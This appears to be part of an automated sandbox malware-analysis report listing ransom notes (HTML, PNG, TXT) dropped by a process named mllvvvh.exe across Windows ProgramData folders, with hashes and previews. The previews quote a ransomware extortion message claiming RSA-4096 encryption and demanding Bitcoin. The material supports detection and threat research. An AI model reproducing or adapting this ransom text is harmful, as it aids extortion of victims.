                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Crypto\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Crypto\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  C:\ProgramData\Microsoft\Crypto\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\DRM\Server\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\DRM\Server\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\DRM\Server\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\DRM\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\DRM\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\DRM\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Device\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Device\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Device Stage\Device\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Task\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Task\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Device Stage\Task\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
